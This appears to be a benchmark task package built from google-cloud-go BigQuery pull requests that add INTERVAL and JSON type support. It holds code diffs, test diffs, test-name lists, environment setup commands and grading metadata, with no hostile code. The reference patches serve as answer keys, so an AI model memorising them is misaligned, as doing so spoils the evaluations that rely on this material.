true}, false, "POINT(-122.335503 47.625536)", geographyParamType, "POINT(-122.335503 47.625536)"}, {NullGeography{Valid: false}, true, "", geographyParamType, NullGeography{Valid: false}}, } diff --git a/bigquery/schema_test.go b/bigquery/schema_test.go index 17b7fc7157..d69cbbd822 100644 --- a/bigquery/schema_test.go +++ b/bigquery/schema_test.go @@ -1084,7 +1084,8 @@ func TestSchemaFromJSON(t *testing.T) { {"name":"aliased_boolean","type":"BOOL","mode":"NULLABLE","description":"Aliased nullable boolean"}, {"name":"aliased_float","type":"FLOAT64","mode":"REQUIRED","description":"Aliased required float"}, {"name":"aliased_record","type":"STRUCT","mode":"NULLABLE","description":"Aliased nullable record"}, - {"name":"aliased_bignumeric","type":"BIGDECIMAL","mode":"NULLABLE","description":"Aliased nullable bignumeric"} + {"name":"aliased_bignumeric","type":"BIGDECIMAL","mode":"NULLABLE","description":"Aliased nullable bignumeric"}, + {"name":"flat_interval","type":"INTERVAL","mode":"NULLABLE","description":"Flat nullable interval"} ]`), expectedSchema: Schema{ fieldSchema("Flat nullable string", "flat_string", "STRING", false, false, nil), @@ -1104,6 +1105,7 @@ func TestSchemaFromJSON(t *testing.T) { fieldSchema("Aliased required float", "aliased_float", "FLOAT", false, true, nil), fieldSchema("Aliased nullable record", "aliased_record", "RECORD", false, false, nil), fieldSchema("Aliased nullable bignumeric", "aliased_bignumeric", "BIGNUMERIC", false, false, nil), + fieldSchema("Flat nullable interval", "flat_interval", "INTERVAL", false, false, nil), }, }, {
[ "TestRetryableErrors", "TestCopy", "TestTables", "TestModels", "TestRoutines", "TestDatasets", "TestDatasetToBQ", "TestBQToDatasetMetadata", "TestDatasetMetadataToUpdateToBQ", "TestConvertAccessEntry", "TestDatasetIdentifiers", "TestPutMultiErrorString", "TestMultiErrorString", "TestErrorFromErrorProto", "TestErrorString", "TestExternalDataConfig", "TestQuote", "TestQualifier", "TestExtract", "TestExtractModel", "TestFileConfigPopulateLoadConfig", "TestFileConfigPopulateExternalDataConfig", "TestPolicyConversions", "TestNewInsertRequest", "TestNewInsertRequestErrors", "TestHandleInsertErrors", "TestValueSavers", "TestValueSaversErrors", "TestParseInterval", "TestCanonicalInterval", "TestIntervalDuration", "TestRowIteratorCacheBehavior", "TestIterator", "TestNextDuringErrorState", "TestNextAfterFinished", "TestIteratorNextTypes", "TestIteratorSourceJob", "TestCreateJobRef", "TestLoad", "TestBQToModelMetadata", "TestModelMetadataUpdateToBQ", "TestModelIdentifiers", "TestNullsJSON", "TestNullFloat64JSON", "TestNullFloat64JSON/float_value", "TestNullFloat64JSON/NaN", "TestNullFloat64JSON/minus_short_infinity", "TestNullFloat64JSON/minus_infinity", "TestNullFloat64JSON/positive_short_infinity", "TestNullFloat64JSON/short_infinity", "TestNullFloat64JSON/long_infinity", "TestNullFloat64JSON/null", "TestParamValueScalar", "TestParamValueArray", "TestParamValueStruct", "TestParamValueErrors", "TestParamType", "TestParamTypeErrors", "TestConvertParamValue", "TestQueryParameter_toBQ", "TestQuery", "TestProbeFastPath", "TestConfiguringQuery", "TestQueryLegacySQL", "TestRead", "TestNoMoreValues", "TestReadError", "TestReadTabledataOptions", "TestReadQueryOptions", "TestRoutineTypeConversions", "TestRoutineTypeConversions/ToRoutineMetadata/empty", "TestRoutineTypeConversions/ToRoutineArgument/empty", "TestRoutineTypeConversions/FromRoutineMetadataToUpdate/null_fields", "TestRoutineTypeConversions/FromRoutineArgument/empty", "TestRoutineTypeConversions/ToRoutineArgument/basic", "TestRoutineTypeConversions/FromRoutineMetadataToUpdate/body_and_libs", "TestRoutineTypeConversions/FromRoutineArgument/basic", "TestRoutineTypeConversions/ToRoutineMetadata/basic", "TestRoutineIdentifiers", "TestRelaxSchema", "TestSchemaConversion", "TestSimpleInference", "TestNestedInference", "TestRepeatedInference", "TestNullInference", "TestEmbeddedInference", "TestRecursiveInference", "TestTagInference", "TestTagInferenceErrors", "TestSchemaErrors", "TestHasRecursiveType", "TestSchemaFromJSON", "TestSchemaToJSONFields", "TestBQToStandardSQLDataType", "TestBQToStandardSQLField", "TestBQToStandardSQLStructType", "TestBQToTableMetadata", "TestTableMetadataToBQ", "TestTableMetadataToUpdateToBQ", "TestTableMetadataToUpdateToBQErrors", "TestTableIdentifiers", "TestConvertBasicValues", "TestConvertTime", "TestConvertSmallTimes", "TestConvertTimePrecision", "TestConvertTimePrecision/1555593697.154358", "TestConvertTimePrecision/1555593697.154359", "TestConvertTimePrecision/1555593697.154360", "TestConvertNullValues", "TestBasicRepetition", "TestNestedRecordContainingRepetition", "TestRepeatedRecordContainingRepetition", "TestRepeatedRecordContainingRecord", "TestConvertRowErrors", "TestValuesSaverConvertsToMap", "TestValuesToMapErrors", "TestStructSaver", "TestStructSaverErrors", "TestNumericStrings", "TestConvertRows", "TestValueList", "TestValueMap", "TestStructLoader", "TestStructLoaderRepeated", "TestStructLoaderNullable", "TestStructLoaderOverflow", "TestStructLoaderFieldOverlap", "TestStructLoaderErrors", "ExampleInferSchema", "ExampleInferSchema_tags" ]
[]
Method: (*IntervalValue).Canonicalize() Location: bigquery/intervalvalue.go Inputs: receiver *IntervalValue (any sign/scale) Outputs: *IntervalValue – a new value where Y‑M and H:M:S.F components have consistent signs and are reduced (months < 12, minutes < 60, etc.) Description: Normalizes an IntervalValue to its canonical form for reliable comparison and formatting. Method: (*IntervalValue).String() Location: bigquery/intervalvalue.go Inputs: receiver *IntervalValue (any form) Outputs: string – canonical interval literal (e.g., “1-2 3 4:5:6.5”) Description: Returns the interval in BigQuery’s canonical string representation, canonicalizing the value first if needed. Method: (*IntervalValue).ToDuration() Location: bigquery/intervalvalue.go Inputs: receiver *IntervalValue (components may include years, months, days, etc.) Outputs: time.Duration – duration representing the interval (years → 12 months, months → 30 days, days → 24 hours) Description: Converts an IntervalValue to a Go time.Duration, using only the time‑related parts after normalizing larger units. Function: ParseInterval(value string) (*IntervalValue, error) Location: bigquery/intervalvalue.go Inputs: value – interval literal in canonical format (e.g., “1-2 3 4:5:6.5”) Outputs: *IntervalValue – parsed representation; error if parsing fails Description: Parses a canonical interval string into an IntervalValue, handling sign and fractional seconds. Function: IntervalValueFromDuration(d time.Duration) *IntervalValue Location: bigquery/intervalvalue.go Inputs: d – Go time.Duration Outputs: *IntervalValue – interval containing only hour, minute, second, sub‑second fields (canonicalized) Description: Creates an IntervalValue from a duration, distributing the duration into hours, minutes, seconds and nanoseconds.
Apache-2.0
{ "base_image_name": "go_1.19.13", "install": [ "export DEBIAN_FRONTEND=noninteractive", "apt-get update", "apt-get install -y -qq golang", "export GOPATH=/root/go", "export GOMODCACHE=$GOPATH/pkg/mod", "export GOCACHE=/root/.cache/go-build", "export XDG_CACHE_HOME=/root/.cache", "mkdir -p $GOPATH", "mkdir -p $GOCACHE", "cd /google-cloud-go", "go mod download" ], "log_parser": "parse_log_gotest", "test_cmd": "cd /google-cloud-go/bigquery && go test -v ." }
{ "num_modified_files": 4, "num_modified_lines": 357, "pr_author": "shollyman", "pr_labels": [ "api: bigquery: Issues related to the BigQuery API.", "size: l: Pull request size is large." ], "llm_metadata": { "code": "A", "code_quality": null, "confidence": 0.96, "detected_issues": { "B1": false, "B2": false, "B3": false, "B4": false, "B5": false, "B6": false }, "detected_issues_explanation": null, "detecte d_issues": null, "difficulty": "medium", "external_urls": [], "intent_completeness": "complete", "patch": null, "pr_categories": [ "core_feat" ], "reason": null, "reasoning": "The issue requests adding INTERVAL type support to the BigQuery client, which the tests exercise by parsing, canonicalizing, and converting intervals, as well as handling them in params and schema. The test expectations are clear and match the implemented behavior, and there are no signs of test coupling, hidden naming requirements, external dependencies, ambiguous specs, unrelated patch artifacts, or undocumented domain knowledge. Therefore the task is well‑specified and solvable.", "suggested_fixes": null, "test_alignment": null, "test_alignment_issues": [], "test_alignment_quick_tree": null, "test_alignment_quick_tree_bootstrap": null, "test_alignment_quick_tree_mocks": null, "test_alignment_quick_tree_params": null, "test_alignment_quick_tree_unrelated": null, "test_alignment_quick_tree_use_hook": null, "test_alignment_quick_tree_use_hook_unrelated": null, "test_alignment_sample_without_replacement": null, "test_alignment_test_alignment_sample_without_replacement": null, "test_build_phylogeny": null, "test_build_phylogeny_unrelated": null, "test_build_phylogeny_use_hook": null, "test_build_phylogeny_use_hook_unrelated": null, "test_core_seq_test_sample_motif_length_1": null, "test_core_seq_test_sample_motif_length_3": null, "test_core_seq_test_sample_without_replacement": null, "test_core_sequence": null, "test_core_sequence_test_sample_motif_length_1": null, "test_core_sequence_test_sample_motif_length_3": null, "test_core_sequence_test_sample_without_replacement": null, "test_sample_motif_length_1": null, "test_sample_motif_length_3": null, "test_sample_without_replacement": null } }
38af8ae88ae851ca21cf385795250ed8e8d16aab
2022-05-04 00:17:02
googleapis__google-cloud-go-5986
diff --git a/bigquery/nulls.go b/bigquery/nulls.go index 6ef53d13fc..cbe4fa34dc 100644 --- a/bigquery/nulls.go +++ b/bigquery/nulls.go @@ -60,6 +60,14 @@ type NullGeography struct { func (n NullGeography) String() string { return nullstr(n.Valid, n.GeographyVal) } +// NullJSON represents a BigQuery JSON string that may be NULL. +type NullJSON struct { + JSONVal string + Valid bool // Valid is true if JSONVal is not NULL. +} + +func (n NullJSON) String() string { return nullstr(n.Valid, n.JSONVal) } + // NullFloat64 represents a BigQuery FLOAT64 that may be NULL. type NullFloat64 struct { Float64 float64 @@ -147,6 +155,9 @@ func (n NullString) MarshalJSON() ([]byte, error) { return nulljson(n.Valid, n.S // MarshalJSON converts the NullGeography to JSON. func (n NullGeography) MarshalJSON() ([]byte, error) { return nulljson(n.Valid, n.GeographyVal) } +// MarshalJSON converts the NullJSON to JSON. +func (n NullJSON) MarshalJSON() ([]byte, error) { return nulljson(n.Valid, n.JSONVal) } + // MarshalJSON converts the NullTimestamp to JSON. func (n NullTimestamp) MarshalJSON() ([]byte, error) { return nulljson(n.Valid, n.Timestamp) } @@ -268,6 +279,20 @@ func (n *NullGeography) UnmarshalJSON(b []byte) error { return nil } +// UnmarshalJSON converts JSON into a NullJSON. +func (n *NullJSON) UnmarshalJSON(b []byte) error { + n.Valid = false + n.JSONVal = "" + if bytes.Equal(b, jsonNull) { + return nil + } + if err := json.Unmarshal(b, &n.JSONVal); err != nil { + return err + } + n.Valid = true + return nil +} + // UnmarshalJSON converts JSON into a NullTimestamp. func (n *NullTimestamp) UnmarshalJSON(b []byte) error { n.Valid = false @@ -350,6 +375,7 @@ var ( typeOfNullBool = reflect.TypeOf(NullBool{}) typeOfNullString = reflect.TypeOf(NullString{}) typeOfNullGeography = reflect.TypeOf(NullGeography{}) + typeOfNullJSON = reflect.TypeOf(NullJSON{}) typeOfNullTimestamp = reflect.TypeOf(NullTimestamp{}) typeOfNullDate = reflect.TypeOf(NullDate{}) typeOfNullTime = reflect.TypeOf(NullTime{}) @@ -368,6 +394,8 @@ func nullableFieldType(t reflect.Type) FieldType { return StringFieldType case typeOfNullGeography: return GeographyFieldType + case typeOfNullJSON: + return JSONFieldType case typeOfNullTimestamp: return TimestampFieldType case typeOfNullDate: diff --git a/bigquery/params.go b/bigquery/params.go index 3c8f0f55be..33c7993ee2 100644 --- a/bigquery/params.go +++ b/bigquery/params.go @@ -78,6 +78,7 @@ var ( bigNumericParamType = &bq.QueryParameterType{Type: "BIGNUMERIC"} geographyParamType = &bq.QueryParameterType{Type: "GEOGRAPHY"} intervalParamType = &bq.QueryParameterType{Type: "INTERVAL"} + jsonParamType = &bq.QueryParameterType{Type: "JSON"} ) var ( @@ -171,6 +172,8 @@ func paramType(t reflect.Type) (*bq.QueryParameterType, error) { return stringParamType, nil case typeOfNullGeography: return geographyParamType, nil + case typeOfNullJSON: + return jsonParamType, nil } switch t.Kind() { case reflect.Int, reflect.Int8, reflect.Int16, reflect.Int32, reflect.Int64, reflect.Uint8, reflect.Uint16, reflect.Uint32: @@ -243,7 +246,8 @@ func paramValue(v reflect.Value) (*bq.QueryParameterValue, error) { typeOfNullTimestamp, typeOfNullDate, typeOfNullTime, - typeOfNullDateTime: + typeOfNullDateTime, + typeOfNullJSON: // Shared: If the Null type isn't valid, we have no value to send. // However, the backend requires us to send the QueryParameterValue with // the fields empty. @@ -261,6 +265,8 @@ func paramValue(v reflect.Value) (*bq.QueryParameterValue, error) { res.Value = fmt.Sprint(v.FieldByName("StringVal").Interface()) case typeOfNullGeography: res.Value = fmt.Sprint(v.FieldByName("GeographyVal").Interface()) + case typeOfNullJSON: + res.Value = fmt.Sprint(v.FieldByName("JSONVal").Interface()) case typeOfNullFloat64: res.Value = fmt.Sprint(v.FieldByName("Float64").Interface()) case typeOfNullBool: @@ -388,6 +394,7 @@ var paramTypeToFieldType = map[string]FieldType{ bigNumericParamType.Type: BigNumericFieldType, geographyParamType.Type: GeographyFieldType, intervalParamType.Type: IntervalFieldType, + jsonParamType.Type: JSONFieldType, } // Convert a parameter value from the service to a Go value. This is similar to, but @@ -432,6 +439,8 @@ func convertParamValue(qval *bq.QueryParameterValue, qtype *bq.QueryParameterTyp return NullTime{Valid: false}, nil case "GEOGRAPHY": return NullGeography{Valid: false}, nil + case "JSON": + return NullJSON{Valid: false}, nil } } diff --git a/bigquery/schema.go b/bigquery/schema.go index 4b090e0632..559f68f65c 100644 --- a/bigquery/schema.go +++ b/bigquery/schema.go @@ -244,6 +244,8 @@ const ( BigNumericFieldType FieldType = "BIGNUMERIC" // IntervalFieldType is a representation of a duration or an amount of time. IntervalFieldType FieldType = "INTERVAL" + // JSONFieldType is a representation of a json object. + JSONFieldType FieldType = "JSON" ) var ( @@ -263,6 +265,7 @@ var ( GeographyFieldType: true, BigNumericFieldType: true, IntervalFieldType: true, + JSONFieldType: true, } // The API will accept alias names for the types based on the Standard SQL type names. fieldAliases = map[FieldType]FieldType{ diff --git a/bigquery/value.go b/bigquery/value.go index 84e55acaae..8077aee5bf 100644 --- a/bigquery/value.go +++ b/bigquery/value.go @@ -178,6 +178,14 @@ func setGeography(v reflect.Value, x interface{}) error { return nil } +func setJSON(v reflect.Value, x interface{}) error { + if x == nil { + return errNoNulls + } + v.SetString(x.(string)) + return nil +} + func setBytes(v reflect.Value, x interface{}) error { if x == nil { v.SetBytes(nil) @@ -309,6 +317,18 @@ func determineSetFunc(ftype reflect.Type, stype FieldType) setFunc { } } + case JSONFieldType: + if ftype.Kind() == reflect.String { + return setJSON + } + if ftype == typeOfNullJSON { + return func(v reflect.Value, x interface{}) error { + return setNull(v, x, func() interface{} { + return NullJSON{JSONVal: x.(string), Valid: true} + }) + } + } + case BytesFieldType: if ftype == typeOfByteSlice { return setBytes @@ -960,6 +980,8 @@ func convertBasicType(val string, typ FieldType) (Value, error) { return Value(r), nil case GeographyFieldType: return val, nil + case JSONFieldType: + return val, nil case IntervalFieldType: i, err := ParseInterval(val) if err != nil {
feat(bigquery): support JSON as a data type
**Title** Add full support for the JSON data type in the BigQuery client library **Problem** The client library did not recognize BigQuery’s native JSON type, preventing users from sending, receiving, or defining JSON fields in queries and schemas. Null handling and parameter conversion for JSON were also missing. **Root Cause** The library’s type system, parameter mapping, and schema definitions lacked entries for the JSON type, so JSON values were treated as unknown or unsupported. **Fix / Expected Behavior** - Introduce a nullable representation for JSON values, with proper string conversion and JSON (un)marshaling. - Register JSON as a distinct field type and expose it through the public schema constants. - Map the JSON field type to the correct query‑parameter type and ensure parameter values are correctly serialized, including null handling. - Extend value conversion logic to accept JSON values when reading results or constructing queries. - Enable struct field mapping for JSON types, both for regular strings and the new nullable JSON wrapper. **Risk & Validation** - Verify that JSON values round‑trip correctly through insert, query, and export operations, including null cases. - Run existing tests to confirm no regressions in other nullable types or parameter handling. - Perform integration tests against a live BigQuery service to ensure the new type is accepted by the API and returned values are properly decoded.
5,986
googleapis/google-cloud-go
diff --git a/bigquery/nulls_test.go b/bigquery/nulls_test.go index 7e5c939a14..7e9b1f0054 100644 --- a/bigquery/nulls_test.go +++ b/bigquery/nulls_test.go @@ -39,6 +39,7 @@ func TestNullsJSON(t *testing.T) { {&NullBool{Valid: true, Bool: true}, `true`}, {&NullString{Valid: true, StringVal: "foo"}, `"foo"`}, {&NullGeography{Valid: true, GeographyVal: "ST_GEOPOINT(47.649154, -122.350220)"}, `"ST_GEOPOINT(47.649154, -122.350220)"`}, + {&NullJSON{Valid: true, JSONVal: "{\"foo\": \"bar\"}"}, `"{\"foo\": \"bar\"}"`}, {&NullTimestamp{Valid: true, Timestamp: testTimestamp}, `"2016-11-05T07:50:22.000000008Z"`}, {&NullDate{Valid: true, Date: testDate}, `"2016-11-05"`}, {&NullTime{Valid: true, Time: nullsTestTime}, `"07:50:22.000001"`}, @@ -49,6 +50,7 @@ func TestNullsJSON(t *testing.T) { {&NullBool{}, `null`}, {&NullString{}, `null`}, {&NullGeography{}, `null`}, + {&NullJSON{}, `null`}, {&NullTimestamp{}, `null`}, {&NullDate{}, `null`}, {&NullTime{}, `null`}, diff --git a/bigquery/params_test.go b/bigquery/params_test.go index 366184894a..6be55301d0 100644 --- a/bigquery/params_test.go +++ b/bigquery/params_test.go @@ -119,6 +119,8 @@ var scalarTests = []struct { {&IntervalValue{Years: 1, Months: 2, Days: 3}, false, "1-2 3 0:0:0", intervalParamType, &IntervalValue{Years: 1, Months: 2, Days: 3}}, {NullGeography{GeographyVal: "POINT(-122.335503 47.625536)", Valid: true}, false, "POINT(-122.335503 47.625536)", geographyParamType, "POINT(-122.335503 47.625536)"}, {NullGeography{Valid: false}, true, "", geographyParamType, NullGeography{Valid: false}}, + {NullJSON{Valid: true, JSONVal: "{\"alpha\":\"beta\"}"}, false, "{\"alpha\":\"beta\"}", jsonParamType, "{\"alpha\":\"beta\"}"}, + {NullJSON{Valid: false}, true, "", jsonParamType, NullJSON{Valid: false}}, } type ( diff --git a/bigquery/value_test.go b/bigquery/value_test.go index 4d08336ed0..3bd7961586 100644 --- a/bigquery/value_test.go +++ b/bigquery/value_test.go @@ -38,6 +38,7 @@ func TestConvertBasicValues(t *testing.T) { {Type: NumericFieldType}, {Type: BigNumericFieldType}, {Type: GeographyFieldType}, + {Type: JSONFieldType}, } row := &bq.TableRow{ F: []*bq.TableCell{ @@ -49,6 +50,7 @@ func TestConvertBasicValues(t *testing.T) { {V: "123.123456789"}, {V: "99999999999999999999999999999999999999.99999999999999999999999999999999999999"}, {V: testGeography}, + {V: "{\"alpha\": \"beta\"}"}, }, } got, err := convertRow(row, schema) @@ -58,7 +60,7 @@ func TestConvertBasicValues(t *testing.T) { bigRatVal := new(big.Rat) bigRatVal.SetString("99999999999999999999999999999999999999.99999999999999999999999999999999999999") - want := []Value{"a", int64(1), 1.2, true, []byte("foo"), big.NewRat(123123456789, 1e9), bigRatVal, testGeography} + want := []Value{"a", int64(1), 1.2, true, []byte("foo"), big.NewRat(123123456789, 1e9), bigRatVal, testGeography, "{\"alpha\": \"beta\"}"} if !testutil.Equal(got, want) { t.Errorf("converting basic values: got:\n%v\nwant:\n%v", got, want) }
[ "TestRetryableErrors", "TestCopy", "TestTables", "TestModels", "TestRoutines", "TestDatasets", "TestDatasetToBQ", "TestBQToDatasetMetadata", "TestDatasetMetadataToUpdateToBQ", "TestConvertAccessEntry", "TestDatasetIdentifiers", "TestPutMultiErrorString", "TestMultiErrorString", "TestErrorFromErrorProto", "TestErrorString", "TestExternalDataConfig", "TestQuote", "TestQualifier", "TestExtract", "TestExtractModel", "TestFileConfigPopulateLoadConfig", "TestFileConfigPopulateExternalDataConfig", "TestPolicyConversions", "TestNewInsertRequest", "TestNewInsertRequestErrors", "TestHandleInsertErrors", "TestValueSavers", "TestValueSaversErrors", "TestParseInterval", "TestCanonicalInterval", "TestIntervalDuration", "TestRowIteratorCacheBehavior", "TestIterator", "TestNextDuringErrorState", "TestNextAfterFinished", "TestIteratorNextTypes", "TestIteratorSourceJob", "TestCreateJobRef", "TestLoad", "TestBQToModelMetadata", "TestModelMetadataUpdateToBQ", "TestModelIdentifiers", "TestNullsJSON", "TestNullFloat64JSON", "TestNullFloat64JSON/float_value", "TestNullFloat64JSON/positive_short_infinity", "TestNullFloat64JSON/long_infinity", "TestNullFloat64JSON/short_infinity", "TestNullFloat64JSON/minus_infinity", "TestNullFloat64JSON/null", "TestNullFloat64JSON/minus_short_infinity", "TestNullFloat64JSON/NaN", "TestParamValueScalar", "TestParamValueArray", "TestParamValueStruct", "TestParamValueErrors", "TestParamType", "TestParamTypeErrors", "TestConvertParamValue", "TestQueryParameter_toBQ", "TestQuery", "TestProbeFastPath", "TestConfiguringQuery", "TestQueryLegacySQL", "TestRead", "TestNoMoreValues", "TestReadError", "TestReadTabledataOptions", "TestReadQueryOptions", "TestRoutineTypeConversions", "TestRoutineTypeConversions/ToRoutineMetadata/empty", "TestRoutineTypeConversions/FromRoutineMetadataToUpdate/null_fields", "TestRoutineTypeConversions/ToRoutineArgument/empty", "TestRoutineTypeConversions/ToRoutineMetadata/basic", "TestRoutineTypeConversions/FromRoutineArgument/basic", "TestRoutineTypeConversions/FromRoutineMetadataToUpdate/body_and_libs", "TestRoutineTypeConversions/FromRoutineArgument/empty", "TestRoutineTypeConversions/ToRoutineArgument/basic", "TestRoutineIdentifiers", "TestRelaxSchema", "TestSchemaConversion", "TestSimpleInference", "TestNestedInference", "TestRepeatedInference", "TestNullInference", "TestEmbeddedInference", "TestRecursiveInference", "TestTagInference", "TestTagInferenceErrors", "TestSchemaErrors", "TestHasRecursiveType", "TestSchemaFromJSON", "TestSchemaToJSONFields", "TestBQToStandardSQLDataType", "TestBQToStandardSQLField", "TestBQToStandardSQLStructType", "TestBQToTableMetadata", "TestTableMetadataToBQ", "TestTableMetadataToUpdateToBQ", "TestTableMetadataToUpdateToBQErrors", "TestTableIdentifiers", "TestConvertBasicValues", "TestConvertTime", "TestConvertSmallTimes", "TestConvertTimePrecision", "TestConvertTimePrecision/1555593697.154358", "TestConvertTimePrecision/1555593697.154359", "TestConvertTimePrecision/1555593697.154360", "TestConvertNullValues", "TestBasicRepetition", "TestNestedRecordContainingRepetition", "TestRepeatedRecordContainingRepetition", "TestRepeatedRecordContainingRecord", "TestConvertRowErrors", "TestValuesSaverConvertsToMap", "TestValuesToMapErrors", "TestStructSaver", "TestStructSaverErrors", "TestNumericStrings", "TestConvertRows", "TestValueList", "TestValueMap", "TestStructLoader", "TestStructLoaderRepeated", "TestStructLoaderNullable", "TestStructLoaderOverflow", "TestStructLoaderFieldOverlap", "TestStructLoaderErrors", "ExampleInferSchema", "ExampleInferSchema_tags" ]
[]
Method: NullJSON.String() string Location: bigquery/nulls.go Inputs: none (receiver NullJSON) Outputs: string – returns `"null"` if n.Valid is false, otherwise the JSON string value. Description: Provides a string representation of a nullable JSON value for debugging and formatting. Method: NullJSON.MarshalJSON() ([]byte, error) Location: bigquery/nulls.go Inputs: none (receiver NullJSON) Outputs: []byte – the JSON encoding of the value (or the literal `null`), error – always nil unless marshaling fails. Description: Serializes a NullJSON into JSON, emitting `null` when the value is invalid. Method: (*NullJSON).UnmarshalJSON(b []byte) error Location: bigquery/nulls.go Inputs: b []byte – the raw JSON payload. Outputs: error – nil on success, or a JSON unmarshaling error. Description: Parses JSON into a NullJSON, setting Valid to false for the literal `null` and to true with the extracted string otherwise. Function: JSONFieldType FieldType = "JSON" Location: bigquery/schema.go Inputs: none (constant) Outputs: FieldType – the identifier used to represent JSON columns in BigQuery schemas. Description: Declares the schema field type for JSON values, enabling schema generation and type mapping. Function: setJSON(v reflect.Value, x interface{}) error Location: bigquery/value.go Inputs: v reflect.Value – a reflect.Value of a string field; x interface{} – the incoming JSON value (expected string or nil). Outputs: error – errNoNulls if x is nil; otherwise nil after setting the string value. Description: Assigns a non‑null JSON string to a struct field during result conversion; rejects nil values because BigQuery does not return NULL for JSON fields.
Apache-2.0
{ "base_image_name": "go_1.19.13", "install": [ "export DEBIAN_FRONTEND=noninteractive", "apt-get update", "apt-get install -y -qq golang", "export GOPATH=/root/go", "export GOMODCACHE=$GOPATH/pkg/mod", "export GOCACHE=/root/.cache/go-build", "export XDG_CACHE_HOME=/root/.cache", "mkdir -p $GOPATH", "mkdir -p $GOCACHE", "cd /google-cloud-go", "go mod download" ], "log_parser": "parse_log_gotest", "test_cmd": "cd /google-cloud-go/bigquery && go test -v ." }
{ "num_modified_files": 4, "num_modified_lines": 63, "pr_author": "shollyman", "pr_labels": [ "api: bigquery: Issues related to the BigQuery API.", "stale: extraold: Pull request is critically old and needs prioritization.", "size: m: Pull request size is medium." ], "llm_metadata": { "code": "A", "code_quality": null, "confidence": 0.88, "detected_issues": { "B1": false, "B2": false, "B3": false, "B4": false, "B5": false, "B6": false }, "detected_issues_explanation": null, "detecte d_issues": null, "difficulty": "medium", "external_urls": [], "intent_completeness": "partial", "patch": null, "pr_categories": [ "core_feat" ], "reason": null, "reasoning": "The issue requests adding JSON support to the BigQuery client, and the test patch adds expectations for NullJSON, JSON param types, schema field, and value conversion. The tests directly verify the needed behavior and there are no unrelated test dependencies. While the issue description is brief, the required functionality is clear from the tests, making the task solvable without external info or naming ambiguities.", "suggested_fixes": null, "test_alignment": null, "test_alignment_issues": [], "test_alignment_quick_tree": null, "test_alignment_quick_tree_bootstrap": null, "test_alignment_quick_tree_mocks": null, "test_alignment_quick_tree_params": null, "test_alignment_quick_tree_unrelated": null, "test_alignment_quick_tree_use_hook": null, "test_alignment_quick_tree_use_hook_unrelated": null, "test_alignment_sample_without_replacement": null, "test_alignment_test_alignment_sample_without_replacement": null, "test_build_phylogeny": null, "test_build_phylogeny_unrelated": null, "test_build_phylogeny_use_hook": null, "test_build_phylogeny_use_hook_unrelated": null, "test_core_seq_test_sample_motif_length_1": null, "test_core_seq_test_sample_motif_length_3": null, "test_core_seq_test_sample_without_replacement": null, "test_core_sequence": null, "test_core_sequence_test_sample_motif_length_1": null, "test_core_sequence_test_sample_motif_length_3": null, "test_core_sequence_test_sample_without_replacement": null, "test_sample_motif_length_1": null, "test_sample_motif_length_3": null, "test_sample_without_replacement": null } }
22d9f1e0cb114e7df2fe21fba4b26b869c9ce323
2022-05-19 17:30:36
googleapis__google-cloud-go-6069
diff --git a/bigquery/go.mod b/bigquery/go.mod index 6377029efa..bc4207dac1 100644 --- a/bigquery/go.mod +++ b/bigquery/go.mod @@ -6,7 +6,7 @@ require ( cloud.google.com/go v0.100.2 cloud.google.com/go/datacatalog v1.3.0 cloud.google.com/go/iam v0.3.0 - cloud.google.com/go/storage v1.22.0 + cloud.google.com/go/storage v1.22.1 github.com/golang/protobuf v1.5.2 github.com/google/go-cmp v0.5.8 github.com/googleapis/gax-go/v2 v2.3.0 diff --git a/bigquery/go.sum b/bigquery/go.sum index a66ea10a26..79e62cd6bc 100644 --- a/bigquery/go.sum +++ b/bigquery/go.sum @@ -55,8 +55,8 @@ cloud.google.com/go/storage v1.5.0/go.mod h1:tpKbwo567HUNpVclU5sGELwQWBDZ8gh0Zeo cloud.google.com/go/storage v1.6.0/go.mod h1:N7U0C8pVQ/+NIKOBQyamJIeKQKkZ+mxpohlUTyfDhBk= cloud.google.com/go/storage v1.8.0/go.mod h1:Wv1Oy7z6Yz3DshWRJFhqM/UCfaWIRTdp0RXyy7KQOVs= cloud.google.com/go/storage v1.10.0/go.mod h1:FLPqc6j+Ki4BU591ie1oL6qBQGu2Bl/tZ9ullr3+Kg0= -cloud.google.com/go/storage v1.22.0 h1:NUV0NNp9nkBuW66BFRLuMgldN60C57ET3dhbwLIYio8= -cloud.google.com/go/storage v1.22.0/go.mod h1:GbaLEoMqbVm6sx3Z0R++gSiBlgMv6yUi2q1DeGFKQgE= +cloud.google.com/go/storage v1.22.1 h1:F6IlQJZrZM++apn9V5/VfS3gbTUYg98PS3EMQAzqtfg= +cloud.google.com/go/storage v1.22.1/go.mod h1:S8N1cAStu7BOeFfE8KAQzmyyLkK8p/vmRq6kuBTW58Y= dmitri.shuralyov.com/gpu/mtl v0.0.0-20190408044501-666a987793e9/go.mod h1:H6x//7gZCb22OMCxBHrMx7a5I7Hp++hsVxbQ4BYO7hU= github.com/BurntSushi/toml v0.3.1/go.mod h1:xHWCNGjB5oqiDr8zfno3MHue2Ht5sIBksp03qcyfWMU= github.com/BurntSushi/xgb v0.0.0-20160522181843-27f122750802/go.mod h1:IVnqGOEym/WlBOVXweHU+Q+/VP0lqqI8lqeDx9IjBqo= @@ -165,6 +165,7 @@ github.com/google/pprof v0.0.0-20210601050228-01bbb1931b22/go.mod h1:kpwsk12EmLe github.com/google/pprof v0.0.0-20210609004039-a478d1d731e9/go.mod h1:kpwsk12EmLew5upagYY7GY0pfYCcupk39gWOCRROcvE= github.com/google/pprof v0.0.0-20210720184732-4bb14d4b1be1/go.mod h1:kpwsk12EmLew5upagYY7GY0pfYCcupk39gWOCRROcvE= github.com/google/renameio v0.1.0/go.mod h1:KWCgfxg9yswjAJkECMjeO8J8rahYeXnNhOm40UhjYkI= +github.com/google/uuid v1.1.2 h1:EVhdT+1Kseyi1/pUmXKaFxYsDNy9RQYkMWRH68J/W7Y= github.com/google/uuid v1.1.2/go.mod h1:TIyPZe4MgqvfeYDBFedMoGGpEw/LqOeaOT+nhxU+yHo= github.com/googleapis/gax-go/v2 v2.0.4/go.mod h1:0Wqv26UfaUD9n4G6kQubkQ+KchISgw+vpHVxEJEs9eg= github.com/googleapis/gax-go/v2 v2.0.5/go.mod h1:DWXyrwAJ9X0FpwwEdw+IPEYBICEFu5mhpdKc/us6bOk= @@ -565,7 +566,6 @@ google.golang.org/genproto v0.0.0-20220222213610-43724f9ea8cf/go.mod h1:kGP+zUP2 google.golang.org/genproto v0.0.0-20220304144024-325a89244dc8/go.mod h1:kGP+zUP2Ddo0ayMi4YuN7C3WZyJvGLZRh8Z5wnAqvEI= google.golang.org/genproto v0.0.0-20220310185008-1973136f34c6/go.mod 